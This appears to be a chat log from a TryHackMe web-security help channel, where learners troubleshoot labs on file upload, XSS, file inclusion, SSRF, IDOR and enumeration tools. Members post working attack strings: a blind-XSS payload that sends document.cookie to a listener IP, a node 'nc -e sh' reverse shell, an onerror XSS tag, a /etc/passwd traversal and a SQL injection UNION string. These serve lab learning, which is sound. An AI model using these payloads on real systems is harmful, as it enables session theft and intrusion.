Data in cookies is arbitrary, decided by the web application. Doesn't have to be of any format, although there are restrictions on length and allowed characters
So I’m in the file upload vuln room and two diff tasks now I’ve uploaded the php reverse shell, adjusting for my IP and port, and after the file successfully uploads I navigate to where it is on the site and click it…. But literally nothing happens on my nc listener…. I’ve tried changing the port several times and still same result, nothing … all the research I’m doing is telling me the firewall could be blocking it but that’s not it, and I’m using the attackbox from within THM so it should def be working smoothly as it has in the past … what am I leaving out or doing wrong?! Thanks in advance
Can you execute other php code, just to check the files get executed properly? Also, doublecheck you use the correct ip. Sometimes the exec functions are disabled. You can check this with php code / error checking.
I finally figured out what was causing the issue…. I wasn’t putting the IP in ‘ ‘ , just straight up number without the single quotes …. I love the feeling when I think it’s something so complicated only to realize it’s something so simple staring me in the face the whole time 😂
In the web Enumeration 1.3 Practical: Gobuster I am using <gobuster vhost -u http://webenum.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t50 > All it is returning is Status code 400
does anyone have a suggestion on how to change that as -s doesn't seem to work?
when I used -v to see the verbose it is listing a ton of status: 200 as missed
Try it using attackbox
Thanks Graves I did find it through the attack box and finished that portion, was wondering if it was something I did that borked gobuster that kept me from getting the correct answer?
Gave +1 Rep to @silent quartz
there's nothing wrong with your command
Thanks
Gave +1 Rep to @silent quartz
I had the same issue with the gobuster vhost enumeration. Kali on windows vmware returned garbage (lots of Status: 400 [Size: 424]). Attackbox performed as expected and returned the two vhosts. The kali machine had no problem with any gobuster enumeration except for vhost. Not sure what the problem was but I'm doing more testing.
I did more testing. I tried the Kali Linux Attacking Machine (Kali Linux not THM AttackBox) on THM (https://tryhackme.com/my-machine). It had the same problem (Status: 400 [Size: 4241]) as my local Kali VM running on VMware. I am ending my testing here because I am short on time. I thought the issue might be related to how Kali handles the /etc/hosts file but every other gobuster attack worked fine. Only gobuster vhost had the problem. Wish I knew why the AttackBox was unaffected.
I would try another distro if I had more time but for now this one will have to remain a mystery unless anyone else has answers.
On a positive note. I am glad to find out how to send the attackbox/THM kali linux to its own window. I prefer to use my own VM but when forced to use the attackbox, the split screen was a little cramped, especially on the laptop.
Ok, so I kept testing and based on @misty shadow 's advice tried an older version of gobuster. Version 3.01 worked for me but he confirmed that 3.1 is working for him.
I stumbled across this example today. I was trying to figure out why one machine could enumerate the vhosts in https://tryhackme.com/room/webenumerationv2#task-6 but another could not. It turns out...
Screenshot showing gobuster 3.01 successful but 3.4 failing on the same machine. Spoiler because it contains the successful gobuster command.
It turns out that the ||--append-domain flag|| is required to get ||newer versions of|| gobuster to work ||like older versions||.
Thank you
Gave +1 Rep to @dreamy prism
Hi can anyone tell me how to learn web exploitation from basics ?
follow the path I suppose but once you get to uploadvulns room, you will see in task 2 links to two rooms, introtoshells and webenumerationv2, I really think those two are most important ones, I just finished up with What the Shell and had so much fun with it
https://tryhackme.com/room/uploadvulns see links in task 2
Thank you so much
Gave +1 Rep to @light pike
describe your question
i don't know the answer to Which directory contains a file?
which room, which task? make it easy
the linux fundamentals room
1 2 or 3? Just link the room and the task number so people know what you are asking about
questions 3, 4, and 5 im struggling with
sorry about the inconveniences,
new to the server'
i mean questions 2, 3, and 4
question 3 4 and 5? Do you mean the questions in Task 5?
The point is that when you need help, it's best if you are very clear about what you need help with 🙂 so whoever may help you, they don't have to put a bunch of effort into finding the task you are referring to.
so for next time it's best to: link the room, state the task number, and then explain what you already tried to find the answer 🙂
task 5 questions 2 3 and 4
yeah just keep that in mind for the future, okay.
So now looking at T5 Q2 'Which directory contains a file? ', assuming you answered the question before that and youve found all the directories, what did you try to do to check which of these directories has a file?
i put in documents because it contains a file
what do you mean?
ah
no the dir is Documents, but there are ||4|| other directories inside Documents, correct?
i think so
if you do ls in the Documents folder, what do you see?
this is what Im seeing
do i have 2 run da machine
oh
that makes sense
thanks so much
that was a huge helping hand
it's best not to skip over the texts in the room, as they usually describe step by step instructions. If you read the texts carefully ( or read them again when you get stuck like this ), most of the time you will be able to figure out your issue 🙂
thanks so much
no worries. have fun
i need help with https://tryhackme.com/room/linuxfundamentalspart1
task 6 question 1
did you check the hint??? also a reminder to check the perms of the files in the folder by doing ls -lah think there are 2 files which start with access.log meaning one of them is correct while the other is unreadable
it starts with THM{ and ends with }
won't give you the whole flag so you gotta figure out the middle part yourself
no problem
you will probably learn a lot about linux and end up using it a decent bit with the attackbox or kali linux virtual machine for later stuff
/prompt beautiful website for shoes
@verbal narwhal wrong server?
I have a brief question of understanding in the SSRF room. Why does the payload x/../private circumvent the filter? What does the x stand for, since it is solely arbitrary..
The x stands for a directory, although might not existent.
So with that payload you would go down 1 directory, inside the x directory, then back up one directory with ../ to then access /private
Hi, I have a question about Blind SQLi - Boolean Based part. Is there any script that increment automatically and guess the password for this sql statement : admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
You could use sqlmap
thank you
Gave +1 Rep to @misty shadow
Question
I can open a document (which I should not have access) on a website with IDOR but it has two steps after I change the id value(which I know for several users) and refresh I need to click on a button to open the document.
I wanted to do this in one step
so I captured the document on burp but it had document_id(which is random) that was idor vulnerable it had option to change id value as well but it didn't affect the result.
Can u suggest a method which I could use to do idor from first page and get the document_id for second page then download the result in one step.
I was hoping to do this in burpsuite.
why does it not error out if x is not a legitimate directory? Thanks for some additional insight on this
Gave +1 Rep to @misty shadow
Hello!
I need your assistance.
I am stuck at the Walk an application. I'm doing Task 5 (Developer Tools - Debugger) and when I click refresh (and select flash 'remove') the website does not stop, I only see a red flag for 1 sec and that's it.
I'm unable to verify what it says
Could you please advise?
GO through the task text again buddy 🤠
You'll get the solution
Hey can I have some box suggestion for OSWA and OSWE.
did you figure this out after? I'm stuck on the same one
what if the cookie can be used cleverly to list files???
how can i hack facebook?
:hammer: RodrigoSanchez#0623 has been banned.
Evening. I'm having difficulty with my terminal's code for the "File Inclusion" room.
I'm on the challenge section (8) and I know what I'm supposed to do for the first flag...but I'm not sure how to execute it properly. From what I learned in the Web fundamentals, you can send a POST via the terminal. So I went to the first challenge room, went to the Network inspector, refreshed, then grabbed the "GET" information from the headers that I want to flip into "POST" (e.g. host, version, user-agent, filename, file, etc.).
Then I ran into my next issue which is making it actually run everything...I used the format that I learned earlier like so:
POST /challenges/chall1.php HTTP/1.1
HOST: (my host IP here)
User-Agent: Mozilla/5.0
file=welcome.php
Unfortunately, when I tried to execute this in my terminal, it gave me: "Please enter content (application/x-www-form-urlencoded) to be POSTed:"
So then I thought maybe it was because I had to enter it all in one line. So I nanoed a new file with the four lines above. Did a quick cat check, then tried to run it with sudo...and I receive the same response.
I know what I'm supposed to do but I'm stuck at this "enter content" in my terminal. Thoughts?
Nevermind, forgot about curl. Some adjustments and options included and grabbed it.
Hello, is someone able to explain why the method used to obtain the last flag of the SSRF module is SSRF and not file inclusion? 🙂
To me it just seemed like file inclusion and can't understand why it is SSRF tbh. Thx
It is both in my opinion, but don't get hung up on it too much
hello i am at Upload Vulnerabilities room i tried to gobuster but i got
```
023/02/03 18:31:18 [!] 2 errors occurred:
* WordList (-w): Must be specified (use -w - for stdin)
* Url/Domain (-u): Must be specified
```
i research that error and i found out that my gobuster is 2.0 but can't update to 3.0
does anyone know how to update gobuster
What are you using attackbox or your own attacking vm ??
my own vm
sudo apt-get update && sudo apt-get upgrade
try this command
i tried both and still 2.0.1
Also which command did you use due to which you got these errors ?? Would be good if you share it here
gobuster dir -u http://shell.uploadvulns.thm -w /home/alphaomega/wordlist/KaliLists/dirbuster/directory-list-2.3-medium.txt
command is okay
sudo apt-get -y install gobuster
try this command @distant needle
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
libflashrom1 libftdi1-2 libllvm13
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
gobuster
0 upgraded, 1 newly installed, 0 to remove and 17 not upgraded.
Need to get 0 B/1,609 kB of archives.
After this operation, 5,088 kB of additional disk space will be used.
Selecting previously unselected package gobuster.
(Reading database ... 215604 files and directories currently installed.)
Preparing to unpack .../gobuster_2.0.1-1build2_amd64.deb ...
Unpacking gobuster (2.0.1-1build2) ...
Setting up gobuster (2.0.1-1build2) ...
Processing triggers for man-db (2.10.2-1) ...
You used the update command right ??
yep
or just upgrade command ??
both
I think it's a bug with gobuster not upgrading wait will share the fix here
thanks a lot
Gave +1 Rep to @silent quartz
@distant needle Can you try reinstalling gobuster ??
See if it installs the latest version ??
i have done like 7 or 8 times since last night
i tried go install github.com/OJ/gobuster/v3@latest too
Try the first fix https://github.com/BlackArch/blackarch/issues/2465
Try removing it and cloning or downloading from github instead of installing through repo
lemme clone the github
If you want to download and install yourself here you go https://github.com/OJ/gobuster/releases/tag/v3.4.0
another problem is my go version is 1.18 and can't update that either
It shouldn't issue the gobuster installation I think
it said that i should have atleast 1.19 go version 😦
For updating go lang you have to remove and reinstall the latest version from it's website wait will share a guide for it
@distant needle https://www.golinuxcloud.com/upgrade-go-version/
In the context of OOP don't cookies store state and not behavior?
The "OWASP Top 10 [Severity 8] Insecure Deserialization - Cookies" section says "Websites use these cookies to store user-specific behaviours like items in their shopping cart or session IDs."
But that doesn't make a lot of sense because I thought things like username & password were states
Username and password are not states
Not of the webapp.
Maybe attributes of the underlying objects, but OOP != webapps
@orchid hazel Can you expand upon that.
I'm paraphrasing but the text described it as
State = properties
Behavior = actions
I think you're significantly misunderstanding, and mixing up OOP concepts and web concepts.
Separate cookies from serialised objects, aside from cookies being somewhere to store things
HTTP state and object state are unrelated.
@orchid hazel I'm confused why it was included as a building block
But thank you for the clarification, that helps a lot.
Gave +1 Rep to @orchid hazel
Looking at it, I have no idea why it's there other than introducing objects which are a needed part of serialisation
Can you explain what do you mean as building blocks ?? Also @orchid hazel correct me if I'm wrong but cookies store sessions or they don't ?? 🤠
What I mean that as a session it will store the amount of attributes the web application requires for verification (Different web apps require different attributes but some come in as common e.g. consider credentials) and the last state of your session on the web application. Sorry if I'm saying something wrong here, please correct me
Cookies just store data.
Often session tokens. Not sessions. The server stores session information.
Ohh... Yeah I knew the server things but TIL. Thank you 🤠
Gave +1 Rep to @orchid hazel
hey
This is just a general question: I finished the cross-site scripting and was surprised about how straightforward it is when analyzing source code and escaping to run javascript. However, it's most likely not that easy with modern websites and input validation (THM having purposefully vulnerable labs).
Is XSS still relevant?
Or perhaps I should say, does XSS struggle to work considering modern web development?
I work as a penetration tester, largely on webapps. XSS is one of the most common issues we find. There's really good defences now, excellent frameworks and CSP, but they're not widely enough adopted.
Or where they are used, they're implemented poorly or have the security weakened enough to not matter
How much "escaping" do you have to do to actually make something like a PoC alert pop up? When I took a look at random websites for fun to see like logins, comments, they're nested under a lot of code.
In the lab prior to the last, it showed almost like an "escape everything" line of code at the end when working through labs 1-6
But it doesn't seem like it would be that easy
You don't reverse engineer javascript unless you're a masochist.
But XSS payloads can be insanely easy. <img src="" onerror=alert(1)> is uh... Worryingly successful.
The clientside code is basically never what you're fighting
So you closed the image source with the closing bracket then used something called onerror to generate the PoC
No
Just entering that exact HTML
It injects an image tag, with an empty src to cause an error, and then an onerror for it
closing tags etc might be needed, but that HTML gets you a long way.
And input validation doesn't just correct that?
Hahaha, input validation?
I think of it in concept to deny in a comments section for example, special characters like <>
You're putting more effort into this than many developers
And even then, they often only filter the input clientside so you just edit the request you're sending in Burp and sail straight through
I'm not very familiar with web development in practice but I would think there would be some best practices and such to make sure that wouldn't happen
You'd hope.
The problem is, something like SQL injection is really a solved problem. We have effectively perfect ways to prevent it, with parameterized queries etc.
SQLi still comes up. People still implement things unsafely
We have excellent tooling now, SAST and DAST for code testing, linters, all sorts. But people still don't do good. Human error, or copy paste from stack overflow, or other problems.
When you say copy/paste from stack overflow, you mean like a template devs use to start building a website?
I mean when people take code from other places, to solve problems. Less starting templates.
XSS is very rare on static websites. It's full web applications where it matters, and there's lots of logic and processing behind those typically.
finding dev instances for quick wins
I wonder how well DevSecOps works
exploiting poorly put together pipelines
change the branching flow or get them to execute arbitrary jobs
Terrible code makes it to prod as well
getting control of pipelines sounds like an excellent injection vector
In the end, human error is still the greatest weakness in anything security-related.
Anyhoo, thanks for satiating my curiosity @orchid hazel .
Gave +1 Rep to @orchid hazel
Doing the OWASP Juice shop. It said for the intercept be off and that walking the application would still be recorded in HTTP history.
Does that require the to be in the target scope?
@halcyon mortar Before I added the IP address to the scope, I wasn't seeing it in the unfiltered HTTP history.
I guess I'm asking how does Burp see any traffic if the intercept is off?
So if I'm understanding you then
If FoxyProxy=on & Intercept=off -> Burp receives traffic but doesn't intercept it
If FoxyProxy=off & Intercept=off -> Burp doesn't receive traffic
Cool thanks @halcyon mortar I had turned off FoxyProxy but that makes a lot of sense now.
Gave +1 Rep to @halcyon mortar
Hey
hi
Hey
hello guys i want someone to understand $_request method in php i didn't in file inclusion room
$_REQUEST method collects data( or values) after submission of a form and you can use those values or data somewhere(if you want to for e.g. storing values in database)
so can i also request php just as i saw in php, what i mean is can this function cause RCE if not sanitised, for example can i request exec or system function
and what request function is different from others like get and post methods
You mean requesting a local file using $_Request method ??
no i mean what difference about $_request function and other method like get and post
GET and POST are http methods not php method
They both work differently
It's a PHP super global
It's a variable that has the data present in the request like HTTP form parameters.
https://www.php.net/manual/en/reserved.variables.request.php
https://www.php.net/manual/en/language.variables.superglobals.php
@silent quartz thanks a lot for helping me out with gobuster version problem i got solution from here https://packages.ubuntu.com/lunar/amd64/gobuster/download
Gave +1 Rep to @silent quartz
Glad you got it solved yourself buddy 🤠
wassup
anyone know common IDOR URI vulnerabilities?
im trying to write a cheat sheet as ive been unable to find IDOR vulns
but no others
Search for bug bounty writeups, there are a bunch on medium, I'm sure you'll find some that used IDOR.
Does tryhackme or HTB have a box or room for how to bypass Cloudflare IP address and find the true IP address of a website?
Seems specific, who are you hacking?
Hello. The File Inclusion room seems to have been updated and the one writeup that is available is outdated. Could someone help me with the Task 5/Lab #3 answer. I am able to read the /etc/passwd file but the answer that worked for me isn't accepted in the answer field.
What did you try as an answer ??
Variations of /lab3.php?file=languages/../../../../../etc/passwd%00"
that all give me the result I want
like /lab3.php?file=include("languages/../../../../../etc/passwd%00").".php");
or /lab3.php?file=include("languages/../../../../../etc/passwd%00"
First question right ??
Task 5, first question yes
Do you think you need these much number of "../" ??
If I remove one (as the answer implies) then the site doesn't read the /etc/passwd
Share a screenshot here of that
You need to verify for that
!docs verify
@silent quartz
You have to understand how and what to include bud. Can you read the text of this room again ??
This command you're trying to include is not right
Ok! I will study the text again. Thank you for your help. If you have any hints, they are welcome.
If you face issues again after re-reading the text ping me 🙂
Wait a min lemme check this
@rare relic The syntax you used here (5 times "../") is giving results and at not 4 times going up "../" because you included languages directory
also why are you using include word and .".php"); in the command ?? Although it doesn't affect the results with your command
Did you craft those requests on your own or got them through some writeup ??
I copied them from the text of the "lesson"
Task 5 text ??
yes
Or maybe you copied from the error
Yeah I get it. It is there for learning purposes only you don't have to use them.
NOTE*
You can craft your own one right ??
I will try it.
Yeah that's why I told you to go through the task text again so that you can understand completely
Thank you very much for your help! I will keep going at it.
If you don't understand anything you can ping me
@silent quartz I finally got it. The lesson text had a lot of extra info, that tripped me up and the question hint wasn't very helpful...
Glad you got it buddy, lemme know if you need my help
Hello!! In the Web Fundamentals path under the "Upload Vulnerabilities" module I can't seem to get this to work in my VM. Here's a screenshot of what I am seeing
if anyone could help that would be awesome
when I check /etc/hosts everything looks good in there.. at least I believe
also I have no previous writing of it, ie. cloned the line more than once... so that's the webpage error I'm receiving and can't find any info about this. any help is super appreciated lol
can we get a screenshot of your /etc/hosts too
the only thing I can think of is option B) here perhaps? but idk how to check
because you are mapping a domain name to an ip with etc/hosts so that you can go to the domain name instead
exactly in this case
http://shell.uploadvulns.thm/ <<<< this worked
well then you can just follow along with the tasks then
thanks, @sweet python !!
Gave +1 Rep to @sweet python
no problem
it's always the most obvious thing right in front of my face
possibly overthinking things, maybe that's the cue for break time
I do... I finally made the move to a VM today and I finally got things working on the 3rd time around hahah
yes I do take notes. I'll also be revisiting things I feel like I struggled with!
thanks again!
hi guys! I'm now doing content-discovery room. Just did task 3 "Favicon" and was wondering what does hashing have to do with favicon file?
hash can tell you what cms is installed on website
So it's auto-hashed when the site is built?
when you have the hash of the favicon icon it can tell you what the CMS is. kinda yes
Can I say that depending on CMS the favicon could use different hashing function?
I think you mixed things up a bit. try reading the task again and do a bit of googling
So I did some more googling and found this.
md5sum is not the same as md5 itself. md5sum uses the md5 algorithm to check a file's integrity.
I thought md5sum was an encryption command and wondered why and how the favicon files are all encrypted automatically!
Thanks anyway @toxic steppe
Gave +1 Rep to @toxic steppe
hi guys I'm doing the "cross-site scripting" room, on task 8: practical example of blind XSS, where we have to use nc -nlvp <port number>. I'm finding that after successfully inserting the js code and creating the support ticket I'm not getting output in the terminal
generated the ticket also
I'm doing it in my VM and </textarea><script>fetch('http://<machine ip I wrote>:9001?cookie=' + btoa(document.cookie) );</script>
Do you have anything listening on 9001?
Yeah you do.
This room can be bugged, This task may, or may not work depending on your tun0 address.
This room and task will be better working on the Attackbox. 🙂
If you still have the room open, I can try?
Right now I ended it
Ah, no worries. 🙂
whats the target ip?
from where do I have to find it?
The ip of the target machine is what I'm requesting. 🙂
What ip did you put in the payload?
I put the IP of the machine only
For the payload it should be your tun0
which IP do you use to connect remote shells to?
Is 10.10.238.103 the target machine?
The ip you got from starting the machine?
yess
yes
Then use that ip.
okay . to use it in payload ?
Yes.
So it will be that ip:9001
What Lassi said.
it's </textarea><script>fetch('http://vpnip:9001?cookie=' + btoa(document.cookie) );</script>
shall i say vpn ip ?
still I'm not getting anything in the terminal 🥲
the VPN is running in my Kali machine only
@halcyon mortar browser console is showing errors
this is my machine ip
I moved on to the terminal and gave the command
nc -nlvp 9001
now on the otherhand
</textarea><script>fetch('http://10.17.21.10:9001/?cookie=' + btoa(document.cookie) );</script>
I entered this in the text area as you said, to use the VPN IP, and clicked on create ticket
this is my machine IP
and the IP mentioned here is the VPN one
it's a home page
then
got it buddy
@halcyon mortar thankyou so much
can you explain in one text what mistake I made?
what I get to learn from this is
- I have to use that VPN IP
yes now I can decode it
I was not using it earlier. Scrubz told me to do so
yes it's my own cookie
okayy
ohh sure I will
I’m in the nmap section. I’m following the “beginner path” and did anyone during this path be like “tf is going on” the whole section. Just the commands and stuff. It’s a ton to take in
It can be overwhelming at first 🙂
Hi all, this is my first time using discord and asking something in the try hack me community, so please tell me if this is not the right place or whatever.
But I had a really confusing time in the practical part, because I thought I was following the commands correctly, but almost none of my answers were correct.
For starters, the first one. I pinged the target machine and it responded, but the answer was that it wasn't responding
root@ip-10-10-35-134:~# nmap -sn 10.10.35.134
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-11 13:25 GMT
Nmap scan report for ip-10-10-35-134.eu-west-1.compute.internal (10.10.35.134)
Host is up.
Nmap done: 1 IP address (1 host up) scanned in 0.00 seconds
Then, I scanned the first 999 ports and this is what I got. So I said 4 ports were open/filtered, but the answer was that all 999 were. Aren't 995 ports closed? I understood that the Xmas scan couldn't differentiate between an open or a filtered port, but if it says it's closed, then it's indeed closed, isn't it?
root@ip-10-10-35-134:~# nmap -sX -p 1-999 10.10.35.134
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-11 13:37 GMT
Nmap scan report for ip-10-10-35-134.eu-west-1.compute.internal (10.10.35.134)
Host is up (0.000044s latency).
Not shown: 995 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
80/tcp  open|filtered http
111/tcp open|filtered rpcbind
389/tcp open|filtered ldap
Nmap done: 1 IP address (1 host up) scanned in 93.57 seconds
Finally, I tried to deploy the ftp-anon script on port 21, but it didn't work, because the port was closed for me, but the answer was that it worked.
Can anyone help me with those? I assumed I would try all of these against the attackbox machine, whose IP was 10.10.35.134, as you can see on my commands, but then almost all of my answers were wrong
henlo
I want to do the Upload Vulnerabilities room, but I can't get past the client side filtering.
I'm using the attackbox and its burp suite to edit the responses to remove the filter script from the response, but it still won't accept the php file with the shell when I upload it.
howdy folks
https://tryhackme.com/room/uploadvulns I finished the challenge (#Task11), and I have few questions about the reverse shell payload. I generated the payload from https://www.revshells.com/.
- Using the javascript version does not work. Any idea why? I thought node can run vanilla js just fine?
- Using the node.js version (require('child_process').exec('nc -e sh 10.10.8.229 8080')) does not work. I got the message "Activated module"
- Using node.js#2 works!!
I'm wondering what's going on here? Is it common to try multiple payloads even for the same platform/framework?
might depend on how you bypassed the upload filter
it could also be because the nc on the target does not have the -e option
Thanks! all of them are uploaded just fine to the server. When I said didn't work it's more on the execution from the admin page.
Oh you mean like an older version of nc? that makes sense. any idea about the javascript version?
Gave +1 Rep to @sweet python
any screenshot of what you've removed and the error you're seeing?
nc -e is only supported on specific versions, not like old versions but parallel maintained versions. You typically have to compile it with the "gaping security hole" option. It's best to avoid it.
Hey everyone! I have a general question about Gobuster: When I want to enumerate extensions with -x , how do I add a wordlist with extensions that should be enumerated? It only works when I add the extensions themselves like -x .php,.cs,.http , but when I want to add a wordlist like -x /extensions.txt, it literally enumerates "/extensions.txt"...
Could someone also please tell me what I'm doing wrong here? I even checked the command online, since I get no results, and it should give me the Virtual Hosts
It's from "Web Enumeration - Task 6"
Thank you very much! It worked even without the additional switch
Now I understand why I had to do this command at the beginning of the task... echo "10.10.49.189 webenum.thm" >> /etc/hosts
In case someone looks for this in the future. This is the correct command, which you can use only after you add "webenum.thm" to your hosts with the IP that was given to you
Why can't I get the staff-session cookie in task 8 of XSS?
Hey there, can someone explain to me why it doesn't execute the php file in the Upload Vuln exercise? When I upload a webshell instead and format this php shell to a URL to execute it there, it works.
But clicking the file in the images folder just shows me the text of it
Would be great if someone would explain to me what the problem is
Yes, the exact same code worked when I encoded it and used it in the url after I got a webshell
Got it from here
Oh, alright. Thanks for the heads up! I'll have to research then how to run .php files on webservers
for some reason in the OWASP top 10 room I am having trouble accessing evilshell.php, it's just loading forever
this seems to be weirdly common but any responses about it before were either ignored or randomly started working
seems like it might actually be a problem with most of that room
as other rooms I'm able to connect to fine
maybe try to terminate and open a new machine
hi all. Can anyone confirm and answer the following question: is it true that in an HTTP POST request you ALWAYS need to specify the variable name and parameter in the REQUEST BODY and thus the REQUEST HEADERS "Content-Type:" AND "Content-Length" are mandatory? For example this works fine:
POST /foo/bar/tryme.php
Host: 10.10.10.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
var1=somevalue
but this doesn't:
POST /foo/bar/tryme.php?var1=somevalue
Host: 10.10.10.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
I think the easiest way to explain it is:
If you're sending a POST request it needs to contain some data.
Mostly the type is good to give in case the server needs to know what's sent.
Though Content-Length is not required.
@valid matrix Thanks for coming back to my q, however I'm not sure if understood correctly. I have done some POST requests and watched them in Firefox Developer Tools. I see that the first line of that POST is starting as the 2nd/last example of my previous post. However, when I test this on the THM Lesson "WebFundamentals" --> Local/Remote File Inclusion (LFI/RFI), Task8 Challenge, I do not succeed in solving the task by a POST request that begins with "POST /foo/bar/tryme.php?var1=somevalue". I am able to solve it through various other methods, but I want to understand why I cannot solve it this way.
Gave +1 Rep to @valid matrix
I haven't gotten that far yet so it could boil down to how the challenge is 🙏😊
But in general making a POST request is sending data to the server.
This can be in the body or through variables. 😊
so far so good, that's not new to me. Unfortunately it does not answer my question. However, thanks for trying to assist.
Can someone explain to me the "&x=" from the SSRF room? I managed to solve the task 2 and it does make sense to me but the example on slide 4 is confusing and I'd like to understand what is going there.
I think that it means that whatever is after &x= gets discarded 🙂
So if you say hello&x=helloWorld it would only execute hello and not helloWorld
If it's not THM, you could probably try #programming
anyone have any good client-side DOM-based XSS resources looking for a deep dive
hi guys, I am trying to understand the importance of a specific step. I just finished the subdomain enumeration room and for the last task with virtual hosts. I get the point of editing the virtual host to try to identify a subdomain using the ffuf tool
HOWEVER, the step before this, we had to run a command to generate a size as shown in the screenshot below. What I don't get is where the size number is coming from and why we need it to identify what the subdomains are?
Can someone explain that to me? I'm really confused. Thank you
The size is a quick way to guess at whether the responses are different
So are the responses with the size of 2395 something that is not hidden? Because it seems all of those could be subdomains
The idea is that you know what size is "normal"
And you're not looking for subdomains, you're looking for VHOSTs. That difference is super important.
See I don't understand what normal means in this context because right now it looks to me like these are all possible virtual hosts that can be identified. Sorry I don't mean to blow you up I'm just trying to understand what this means
Do you know what "size" is actually referring to?
Also words, lines, what those are referring to
To be honest, I don't.
Ok so that's a good place to start
It's the length of the HTTP response, in bytes or lines or words
So the "normal" web page for a non-existing vhost will have the "normal" value, whatever it is for that webserver in that case.
These are the ones that have the value of 2395 you are referring to right?
Looks like it, doesn't it?
So I guess now I'm trying to understand the difference between the ones that have the much smaller size from the others
They're responses with different content
That's a good thing, that means there's something different. Something might be there.
a
hi, I have a question. I am stuck on OWASP top 10, task 26. I have done all of the modules without problem so far, but on insecure deserialization - code execution where i have to spawn a reverse shell by virtue of replacing the value of the encoded payload cookie i run into an issue.
I have the local netcat listener on port 4444 but I am not receiving a connection from the broken site.
can anyone nudge me in the right direction of what I'm doing wrong?
I am on my local machine (ubuntu 22.04). I replaced my own VPN IP inside the file and ran it, and have a serialized payload after that. I input that in the value field and reload, but then the site hangs and I get a bad gateway, 504 error.
I notice that on the nc on Kali it says [any] where for me it just says listening on 4444, but I think it's still taking all anyway.
I redid it a few times now, restarted the VM and cleared my cookies, but I can't find my error. do I need to specify the interface of the VPN or something?
hmm, the Kali machine worked for me right away. I don't understand why it didn't work for me on my machine, but help is no longer needed.
you need to be connected to the tryhackme openvpn for it to be able to connect in the first place
I understand. I was.
have the tryhackme vpn open in 1 terminal, 1 terminal nc listener, and browsing the site in locally too
do you get a result if you curl 10.10.10.10/whoami normally it should be your attack machines ip on the tryhackme network
I closed my local vpn to the site as soon as I started the attackbox and completed the assignment, but I can try, I did get an IP on my vpn interface in that 10.10/16 range for sure tho.
I had been doing assignments on that particular machine locally all the time already
ah okay then dunno what went wrong
thanks for the help anyways
I asked also in the channel designed for that room
to clarify
I am there in Task 7 Upload vulnerabilities and java.uploadvulns.thm does not open
Are you doing https or http?
http:
I'm doing the file inclusion task, and I understand the process, but I don't see how you would implement this process irl. anyone care to explain?
Hello, guys. I'm trying the [Web Enumeration] room for finding vhosts with Gobuster. I did research online about it and no luck. I did put the right IP in /etc/hosts. I tried to reinstall both Gobuster and SecLists but the problem seems the same. Dir search with Gobuster works well, the problem is just vhost. Have you guys faced issues like this before?
gobuster vhost -u webenum.thm -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@wispy trenchefart)
[+] Url: http://webenum.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
[+] Append Domain: false
2023/04/15 01:19:22 Starting gobuster in VHOST enumeration mode
Found: 1 Status: 400 [Size: 424]
Found: 11192521403954 Status: 400 [Size: 424]
Found: 11192521404255 Status: 400 [Size: 424]
Found: gc._msdcs Status: 400 [Size: 424]
Found: 2 Status: 400 [Size: 424]
Found: 11285521401250 Status: 400 [Size: 424]
Found: 2012 Status: 400 [Size: 424]
Found: 11290521402560 Status: 400 [Size: 424]
Found: 123 Status: 400 [Size: 424]
Found: 2011 Status: 400 [Size: 424]
Found: 3 Status: 400 [Size: 424]
Found: 4 Status: 400 [Size: 424]
Found: 2013 Status: 400 [Size: 424]
Found: 2010 Status: 400 [Size: 424]
Found: 911 Status: 400 [Size: 424]
Found: 11 Status: 400 [Size: 424]
Found: 24 Status: 400 [Size: 424]
Found: 10 Status: 400 [Size: 424]
Found: 7 Status: 400 [Size: 424]
Found: 99 Status: 400 [Size: 424]
Found: 2009 Status: 400 [Size: 424]
Found: www.1 Status: 400 [Size: 424]
Found: 50 Status: 400 [Size: 424]
Found: 12 Status: 400 [Size: 424]
Found: 20 Status: 400 [Size: 424]
Found: 2008 Status: 400 [Size: 424]
Found: 25 Status: 400 [Size: 424]
Found: 15 Status: 400 [Size: 424]
Found: 5 Status: 400 [Size: 424]
Found: www.2 Status: 400 [Size: 424]
Found: 13 Status: 400 [Size: 424]
Found: 100 Status: 400 [Size: 424]
Found: 44 Status: 400 [Size: 424]
Found: 54 Status: 400 [Size: 424]
Found: 9 Status: 400 [Size: 424]
Found: 70 Status: 400 [Size: 424]
Found: 01 Status: 400 [Size: 424]
Found: 16 Status: 400 [Size: 424]
Found: 39 Status: 400 [Size: 424]
Found: 6 Status: 400 [Size: 424]
Found: www.123 Status: 400 [Size: 424]
Progress: 4982 / 4990 (99.84%)
2023/04/15 01:21:00 Finished
I'm sorry for inconvenience, couldn't put the image here. 🙇
Bro @cursive obsidian me
In the authentication bypass room in the username enumeration task this command with ffuf is used:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.48.219/customers/signup -mr "username already exists"
I understand what this does, but not how it works. The first part is easy it just specifies the wordlist in use
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt
the next part I don't really get, is it using POST because it's inputting data to the website?
-X POST -d
In this part I don't get how ffuf knows where to put the email, password and password confirm, because we don't tell ffuf what the title of the input is
"username=FUZZ&email=x&password=x&cpassword=x"
This is the part I am most lost with. How do I know that I am supposed to use exactly this header?
"Content-Type: application/x-www-form-urlencoded"
Thanks
@wraith terrace With -X POST you define the ffuf to use HTTP POST requests to, exactly as you thought, send data to the site's server / backend. In this case, when user normally would use browser to send the data, the browser would send HTTP POST Request to "endpoint" http://IP/customers/signup.
